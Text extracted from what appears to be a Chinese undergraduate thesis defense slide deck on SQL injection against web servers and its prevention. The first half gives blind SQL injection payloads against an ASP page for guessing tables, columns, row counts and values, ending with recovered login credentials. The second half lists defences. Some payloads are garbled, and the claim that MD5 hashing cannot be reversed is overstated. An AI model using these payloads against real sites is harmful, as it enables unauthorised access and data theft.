基于web服务器SQL的入侵与防护本科毕业论文答辩演示幻灯片.pptVIP

基于web服务器SQL的入侵与防护;CONTENTS;web服务器SQL注入;搜寻网站SQL注入点 尝试几个有传入参数的页面，逐个测试是否有SQL注入漏洞，识别方法为：把网址栏的ID=***加个号“’”，如果提示表达式错误，表示有漏洞可注入，另外，通过这个方式可以得到程序所用的数据库类型。 点击北京链接会发现地址栏中出现了变量，直接在后面加入“’”返回错误，初步判断有注入漏洞。 ;;破解的流程如下：判断数据库表名—?判断数据库列名—判断列名字段个数—字段猜解 下面沾出实验的五个语句，然后慢慢带着大家破解 测试数据库中字段长度： /index.asp?city=bjand (select top 1 len(tel)from info)10and1=1 猜测数据库中表 ?and?exists?(select?*?from?admin)?and?1=1 ;猜测数据库中字段子列 ?and?exists?(select?admin?from?info)?and?1=1 利用二分法猜测数据库中的信息条数 ?and?(select?Count(1)?from?[info]?where?1=1)?between?0?and?100?and?1=1 猜测数据库中值得代码 /index.asp?city=bjand (select top 1 asc(mid(city,1,1))from info)97and1=1 ;综合上述分析我们得到用户名username：huang 同理我们得到密码 password；fu 用所得到的用户名和密码登陆 ;登陆结果截图如下;web服务器SQL漏洞防护;基础过滤与二次过滤：主要就是使用代码可以过滤ID参数中的“；”，“，”和“insert”字符，如果在ID参数中包含有这几个字符，则会返回错误页面 使用SQL通用防注入程序进行过滤：通过手工的方法对特殊字符进行过滤难免会留下过滤不严的漏洞。而使用“SQL通用防注入程序”可以全面地对程序进行过滤，从而很好的阻止SQL脚本注入漏洞的产生。从网上下载“SQL通用防注入程序V3.0”存放在自己网站所在的文件夹中，需要进行简单设置就可以轻松帮助程序员防御SQL注入 ;设置错误提示信息：SQL注入主要依据是IIS给出的ASP错误信息，所以配置IIS和数据库用户权限，可以阻止SQL注入攻击。 使用专业的漏洞扫描工具：企业应当投资于一些专业漏洞的扫描工具，如Acunetix的web漏洞扫描程序等。一个完善的???洞扫描程序可以查找网站上的SQL注入式漏洞；而程序员应当使用漏洞扫描工具和站点监视工具对网站进行测试。 对重要数据进行加密：采用加密技术对一些重要的数据进行加密，比如用MD5加密，MD5没有反向算法，也不能解密，就可以防范对网站的危害了。